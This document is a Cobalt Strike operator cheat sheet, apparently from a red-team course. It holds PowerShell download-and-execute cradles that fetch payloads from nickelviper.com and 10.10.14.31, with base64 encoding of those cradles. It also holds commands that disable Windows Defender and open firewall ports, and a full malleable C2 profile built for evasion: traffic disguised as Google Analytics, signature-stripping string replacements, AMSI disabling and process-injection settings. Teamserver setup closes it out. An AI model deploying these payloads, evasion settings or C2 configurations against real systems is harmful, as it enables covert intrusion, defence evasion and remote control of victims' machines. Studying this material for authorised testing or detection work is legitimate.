# Run a python3 webserver
$ python3 -m http.server
# Check outbound access to TeamServer
$ iwr -Uri <http://nickelviper.com/a>
$ iwr -Uri <http://nickelviper.com/a> -OutFile beacon.ps1
# Change incoming firewall rules
beacon> powerpick Get-NetFirewallRule
# Enable http inbound and outbound connection
beacon> powerpick New-NetFirewallRule -Name "HTTP-Inbound" -DisplayName "HTTP (TCP-In)" -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 80
beacon> powerpick New-NetFirewallRule -Name "HTTP-Outbound" -DisplayName "HTTP (TCP-Out)" -Enabled True -Direction Outbound -Protocol TCP -Action Allow -LocalPort 80
# Enable Specific port inbound and outbound connection
# Inbound Rule
beacon> powerpick New-NetFirewallRule -Name "Allow-Port-Inbound" -DisplayName "Allow Inbound Connections to Port 12345" -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 4444
# Outbound Rule
beacon> powerpick New-NetFirewallRule -Name "Allow-Port-Outbound" -DisplayName "Allow Outbound Connections to Port 12345" -Enabled True -Direction Outbound -Protocol TCP -Action Allow -RemotePort 4444
# Removing a firewall rule by its name
beacon> powerpick Remove-NetFirewallRule -DisplayName "Test Rule"
# Disabled Real Time Protection / Windows Defender
beacon> powerpick Set-MPPreference -DisableRealTimeMonitoring $true -Verbose
beacon> powerpick Set-MPPreference -DisableIOAVProtection $true -Verbose
beacon> powerpick Set-MPPreference -DisableIntrusionPreventionSystem $true -Verbose
## Encode the powershell payload to base64 for handling extra quotes
# From Powershell
PS C:\\> $str = 'IEX ((new-object net.webclient).downloadstring("<http://nickelviper.com/a>"))'
PS C:\\> [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
#From Linux
$ echo -n "IEX(New-Object Net.WebClient).downloadString('<http://10.10.14.31/shell.ps1>')" | iconv -t UTF-16LE | base64 -w 0
# Final Command to execute encoded payload
powershell -nop -enc <BASE64_ENCODED_PAYLOAD>
# CobaltStrike AggressorScripts for Persistence
<https://github.com/Peco602/cobaltstrike-aggressor-scripts/tree/main/persistence-sharpersist>
./c2lint c2-profiles/custom/custom.profile# make our C2 look like a Google Web Bug
# <https://developers.google.com/analytics/resources/articles/gaTrackingTroubleshooting>
#
# Author: @armitagehacker
set sleeptime "30000"; # 45 Seconds
set jitter "37"; # % jitter
set data_jitter "100";
https-certificate {
set keystore "localhost.store";
set password "pass123";
}
http-get {
set uri "/__utm.gif";
client {
parameter "utmac" "UA-2202604-2";
parameter "utmcn" "1";
parameter "utmcs" "ISO-8859-1";
parameter "utmsr" "1280x1024";
parameter "utmsc" "32-bit";
parameter "utmul" "en-US";
metadata {
netbios;
prepend "SESSIONID=";
header "Cookie";
# prepend "__utma";
# parameter "utmcc";
}
# Metadata/beacon data will be appended to cookie header as SessionID value, it can be used with cookie rules in redirector to filter traffic based on cookie is present or not.
#metadata {
# netbios;
# prepend "SESSIONID=";
# header "Cookie";
#}
}
server {
header "Content-Type" "image/gif";
output {
# hexdump pixel.gif
# 0000000 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00
# 0000010 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00
# 0000020 01 00 01 00 00 02 01 44 00 3b
prepend "\\x01\\x00\\x01\\x00\\x00\\x02\\x01\\x44\\x00\\x3b";
prepend "\\xff\\xff\\xff\\x21\\xf9\\x04\\x01\\x00\\x00\\x00\\x2c\\x00\\x00\\x00\\x00";
prepend "\\x47\\x49\\x46\\x38\\x39\\x61\\x01\\x00\\x01\\x00\\x80\\x00\\x00\\x00\\x00";
print;
}
}
}
http-post {
set uri "/___utm.gif";
client {
header "Content-Type" "application/octet-stream";
id {
prepend "UA-220";
append "-2";
parameter "utmac";
}
parameter "utmcn" "1";
parameter "utmcs" "ISO-8859-1";
parameter "utmsr" "1280x1024";
parameter "utmsc" "32-bit";
parameter "utmul" "en-US";
output {
print;
}
}
server {
header "Content-Type" "image/gif";
output {
prepend "\\x01\\x00\\x01\\x00\\x00\\x02\\x01\\x44\\x00\\x3b";
prepend "\\xff\\xff\\xff\\x21\\xf9\\x04\\x01\\x00\\x00\\x00\\x2c\\x00\\x00\\x00\\x00";
prepend "\\x47\\x49\\x46\\x38\\x39\\x61\\x01\\x00\\x01\\x00\\x80\\x00\\x00\\x00\\x00";
print;
}
}
}
# Enable or disable staged payloads
set host_stage "false";
#http-stager {
# server {
# header "Content-Type" "image/gif";
# }
#}
stage {
# Reference : <https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/malleable-c2-extend_pe-memory-indicators.htm?Highlight=set%20obfuscate>
# CS 4.2 added allocator and MZ header overrides
set allocator "MapViewOfFile"; # Options are: HeapAlloc, MapViewOfFile, and VirtualAlloc
set magic_mz_x86 "SVAC";
set magic_mz_x64 "CVAS";
set magic_pe "NO";
set userwx "false";
set stomppe "true";
set cleanup "true";
set obfuscate "false";
# CS 3.12 Addition "Obfuscate and Sleep"
set sleep_mask "true";
# CS 4.1
set smartinject "true";
# Make the Beacon Reflective DLL look like something else in memory
# Values captured using peclone against a Windows 10 version of explorer.exe
set checksum "0";
set compile_time "11 Nov 2016 04:08:32";
set entry_point "650688";
set image_size_x86 "4661248";
set image_size_x64 "4661248";
set name "srv.dll";
set rich_header "\\x3e\\x98\\xfe\\x75\\x7a\\xf9\\x90\\x26\\x7a\\xf9\\x90\\x26\\x7a\\xf9\\x90\\x26\\x73\\x81\\x03\\x26\\xfc\\xf9\\x90\\x26\\x17\\xa4\\x93\\x27\\x79\\xf9\\x90\\x26\\x7a\\xf9\\x91\\x26\\x83\\xfd\\x90\\x26\\x17\\xa4\\x91\\x27\\x65\\xf9\\x90\\x26\\x17\\xa4\\x95\\x27\\x77\\xf9\\x90\\x26\\x17\\xa4\\x94\\x27\\x6c\\xf9\\x90\\x26\\x17\\xa4\\x9e\\x27\\x56\\xf8\\x90\\x26\\x17\\xa4\\x6f\\x26\\x7b\\xf9\\x90\\x26\\x17\\xa4\\x92\\x27\\x7b\\xf9\\x90\\x26\\x52\\x69\\x63\\x68\\x7a\\xf9\\x90\\x26\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00";
## WARNING: Module stomping
# Cobalt Strike 3.11 also adds module stomping to Beacon's Reflective Loader. When enabled, Beacon's loader will shun VirtualAlloc and instead load a DLL into the current process and overwrite its memory.
# Set module_x86 to a favorite x86 DLL to module stomp with the x86 Beacon. The module_x64 option enables this for the x64 Beacon.
# While this is a powerful feature, caveats apply! If the library you load is not large enough to host Beacon, you will crash Beacon's process. If the current process loads the same library later (for whatever reason), you will crash Beacon's process. Choose carefully.
# By default, Beacon's loader allocates memory with VirtualAlloc. Module stomping is an alternative to this. Set module_x86 to a DLL that is about twice as large as the Beacon payload itself. Beacon's x86 loader will load the specified DLL, find its location in memory, and overwrite it. This is a way to situate Beacon in memory that Windows associates with a file on disk. It's important that the DLL you choose is not needed by the applications you intend to reside in. The module_x64 option is the same story, but it affects the x64 Beacon.
# Details can be found in the In-memory Evasion video series. <https://youtu.be/uWVH9l2GMw4>
# set module_x64 "netshell.dll";
# set module_x86 "netshell.dll";
# CS 4.8 - Added default syscall method option. This option supports: None, Direct, and Indirect.
set syscall_method "None";
# The transform-x86 and transform-x64 blocks pad and transform Beacon's Reflective DLL stage. These blocks support three commands: prepend, append, and strrep.
transform-x86 { # transform the x86 rDLL stage
prepend "\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90"; # prepend nops
strrep "ReflectiveLoader" "execute"; # Change this text
strrep "This program cannot be run in DOS mode" ""; # Remove this text
strrep "beacon.dll" ""; # Remove this text
# Taken from <https://0xmaz.me/posts/Cobalt-Strike-C2-Memory-Evasion-Part1/#transform-blocks-explanation>
strrep "%s as %s\\\\%s: %d" "%s - %s\\\\%s: %d";
strrep "%02d/%02d/%02d %02d:%02d:%02d" "%02d-%02d-%02d %02d:%02d:%02d";
}
# Check <https://whiteknightlabs.com/2023/05/23/unleashing-the-unseen-harnessing-the-power-of-cobalt-strike-profiles-for-edr-evasion/>
transform-x64 { # transform the x64 rDLL stage
strrep "(admin)" "(adm)";
# Taken from <https://0xmaz.me/posts/Cobalt-Strike-C2-Memory-Evasion-Part1/#transform-blocks-explanation>
strrep "%s as %s\\\\%s: %d" "%s - %s\\\\%s: %d";
strrep "%02d/%02d/%02d %02d:%02d:%02d" "%02d-%02d-%02d %02d:%02d:%02d";
#strrep "%s as %s\\\\%s: %d" "%s - %s\\\\%s: %d";
strrep "%s as %s\\\\%s: %d" "%s -- %s\\\\%s: %d";
strrep "%02d/%02d/%02d %02d:%02d:%02d" "%02d/%02d/%02d,%02d:%02d:%02d";
strrep "\\x48\\x89\\x5C\\x24\\x08\\x57\\x48\\x83\\xEC\\x20\\x48\\x8B\\x59\\x10\\x48\\x8B\\xF9\\x48\\x8B\\x49\\x08\\xFF\\x17\\x33\\xD2\\x41\\xB8\\x00\\x80\\x00\\x00" "\\x31\\xC0\\x89\\x5C\\x24\\x08\\x57\\x83\\xEC\\x20\\x48\\x8B\\x59\\x10\\x48\\x8B\\xF9\\x48\\x8B\\x49\\x08\\xFF\\x17\\x33\\xD2\\x41\\xB8\\x00\\x80\\x00\\x00";
strrep "\\x25\\xFF\\xFF\\xFF\\x00\\x3D\\x41\\x41\\x41\\x00" "\\xB8\\x41\\x41\\x41\\x00\\x3D\\x41\\x41\\x41\\x00";
#strrep "\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41" "\\x44\\x44\\x44\\x44\\x44\\x44\\x44\\x44";
#strrep "\\x41\\x41\\x41" "\\x44\\x44\\x44";
#strrep "\\x42\\x42\\x42\\x42\\x42\\x42\\x42\\x42" "\\x43\\x43\\x43\\x43\\x43\\x43\\x43\\x43";
#strrep "\\x42\\x42\\x42" "\\x43\\x43\\x43";
strrep "This program cannot be run in DOS mode" ""; # Remove this text
strrep "ReflectiveLoader" "";
strrep "beacon.x64.dll" "";
strrep "beacon.dll" ""; # Remove this text
strrep "msvcrt.dll" "";
strrep "C:\\\\Windows\\\\System32\\\\msvcrt.dll" "";
strrep "Stack around the variable" "";
strrep "was corrupted." "";
strrep "The variable" "";
strrep "is being used without being initialized." "";
strrep "The value of ESP was not properly saved across a function call. This is usually a result of calling a function declared with one calling convention with a function pointer declared" "";
strrep "A cast to a smaller data type has caused a loss of data. If this was intentional, you should mask the source of the cast with the appropriate bitmask. For example:" "";
strrep "Changing the code in this way will not affect the quality of the resulting optimized code." "";
strrep "Stack memory was corrupted" "";
strrep "A local variable was used before it was initialized" "";
strrep "Stack memory around _alloca was corrupted" "";
strrep "Unknown Runtime Check Error" "";
strrep "Unknown Filename" "";
strrep "Unknown Module Name" "";
strrep "Run-Time Check Failure" "";
strrep "Stack corrupted near unknown variable" "";
strrep "Stack pointer corruption" "";
strrep "Cast to smaller type causing loss of data" "";
strrep "Stack memory corruption" "";
strrep "Local variable used before initialization" "";
strrep "Stack around" "corrupted";
strrep "operator" "";
strrep "operator co_await" "";
strrep "operator<=>" "";
}
stringw "jQuery"; # Add this string to the DLL
}
post-ex {
# Optionally specify non-existent filepath to force manual specification based on the Beacon host's running processes
set spawnto_x86 "%windir%\\\\syswow64\\\\werfault.exe";
# set spawnto_x86 "c:\\\\windows\\\\syswow64\\\\cmd.exe";
# Hardcode paths like C:\\\\Windows\\\\System32\\\\dllhost.exe to avoid potential detections for %SYSNATIVE% use. !! This will break when attempting to spawn a 64bit post-ex job from a 32bit Beacon.
# set spawnto_x64 "%windir%\\\\System32\\\\werfault.exe";
set spawnto_x64 "C:\\\\program files (x86)\\\\microsoft\\\\edge\\\\application\\\\msedge.exe";
# change the permissions and content of our post-ex DLLs
set obfuscate "true";
# pass key function pointers from Beacon to its child jobs
set smartinject "true";
# disable AMSI in powerpick, execute-assembly, and psinject
set amsi_disable "true";
# Modify our post-ex pipe names
# set pipename "Winsock2\\\\CatalogChangeListener-###-0,";
set pipename "TSVCPIPE-########-####-####-1337-############";
# set keylogger "GetAsyncKeyState";
#set threadhint "module!function+0x##"
}
process-inject {
# set a remote memory allocation technique: VirtualAllocEx|NtMapViewOfSection
set allocator "NtMapViewOfSection";
# CS 4.7 added memory allocation methods for BOF content in the current process
set bof_allocator "HeapAlloc"; # Options are: HeapAlloc, MapViewOfFile, and VirtualAlloc
set bof_reuse_memory "false"; # tells Beacon to free BOF memory after execution.
# Minimium memory allocation size when injecting content
set min_alloc "17500";
# Set memory permissions as permissions as initial=RWX, final=RX
set startrwx "false"; # Tells beacon to allocate BOF memory as RW
set userwx "false"; # Tells Beacon to set the memory to RX before execution.
# Transform injected content to avoid signature detection of first few bytes. Only supports prepend and append.
transform-x86 {
prepend "\\x90\\x90";
#append "\\x90\\x90";
}
transform-x64 {
prepend "\\x90\\x90";
#append "\\x90\\x90";
}
## The execute block controls the methods Beacon will use when it needs to inject code into a process. Beacon examines each option in the execute block, determines if the option is usable for the current context, tries the method when it is usable, and moves on to the next option if code execution did not happen. The execute options include:
#
# Name x86->x64 x64-x86 Notes
#########################################################################
# CreateThread Current Process only
# CreateRemoteThread Yes No cross-session
# NtQueueApcThread
# NtQueAPCThread-s This is the "Early Bird" injection technique. Suspended processes (e.g., post-ex jobs) only.
# RtlCreateUserThread Yes Yes Risky on XP-era targets; uses RWX shellcode for x86->x64 injection.
# SetThreadContext Yes Suspended processes (e.g. post-ex jobs only)
execute {
# The order is important! Each step will be attempted (if applicable) until successful
## self-injection
CreateThread "ntdll!RtlUserThreadStart+0x42";
CreateThread;
## Injection via suspened processes (SetThreadContext|NtQueueApcThread-s)
# OPSEC - when you use SetThreadContext; your thread will have a start address that reflects the original execution entry point of the temporary process.
# SetThreadContext;
NtQueueApcThread-s;
## Injection into existing processes
# OPSEC Uses RWX stub - Detected by Get-InjectedThread. Less detected by some defensive products.
#NtQueueApcThread;
# CreateRemotThread - Vanilla cross process injection technique. Doesn't cross session boundaries
# OPSEC - fires Sysmon Event 8
CreateRemoteThread;
# RtlCreateUserThread - Supports all architecture dependent corner cases (e.g., 32bit -> 64bit injection) AND injection across session boundaries
# OPSEC - fires Sysmon Event 8. Uses Meterpreter implementation and RWX stub - Detected by Get-InjectedThread
RtlCreateUserThread;
}
}
Configure Beacon Certificates
# 1. Generate certificate keypair using openssl
attacker@teamserver ~/cobaltstrike> openssl req -x509 -nodes -newkey rsa:2048 -keyout localhost.key -out localhost.crt -sha256 -days 365 -subj '/CN=localhost'
# 2. Because the team server is written in Java, these need to be imported into a Java KeyStore format. First, combine the separate public and private files into a single PFX file.
attacker@teamserver ~/cobaltstrike> openssl pkcs12 -inkey localhost.key -in localhost.crt -export -out localhost.pfx
Enter Export Password: pass123
Verifying - Enter Export Password: pass123
# 3. The PFX file can then be converted to a Java KeyStore using the keytool utility. The password of this new store can be the same or different to the one you used to export the PKCS12.
attacker@teamserver ~/cobaltstrike> keytool -importkeystore -srckeystore localhost.pfx -srcstoretype pkcs12 -destkeystore localhost.store
# 4. This will produce a new file, localhost.store, which needs to be copied this to the team server.
attacker@teamserver ~/cobaltstrike> rm localhost.pfx
# 5. Add certificate to your malleable c2 profile
https-certificate {
set keystore "localhost.store";
set password "pass123";
}
# 6. Launch the team server with the updated profile.
attacker@teamserver ~/cobaltstrike> sudo ./teamserver 10.10.5.50 Passw0rd! c2-profiles/custom-crtl.profile
# 7. Then start a new HTTPS listener using the domain name, and verify the certificate on the listener by hitting it with curl.
attacker@DESKTOP-3BSK7NO ~> curl -v -k <https://10.10.5.50>
Start the teamserver and run as service
> sudo ./teamserver 10.10.5.50 Passw0rd! c2-profiles/custom-crtl.profileRun Teamserver as a Service
$ ip a
$ sudo nano /etc/systemd/system/teamserver.service
[Unit]
Description=Cobalt Strike Team Server
After=network.target
StartLimitIntervalSec=0
[Service]
Type=simple
Restart=always
RestartSec=1
User=root
WorkingDirectory=/home/attacker/cobaltstrike
ExecStart=/home/attacker/cobaltstrike/teamserver 10.10.5.50 Passw0rd! c2-profiles/custom-crtl.profile
[Install]
WantedBy=multi-user.target
$ sudo systemctl daemon-reload
$ sudo systemctl status teamserver.service
$ sudo systemctl start teamserver.service
$ sudo systemctl enable teamserver.service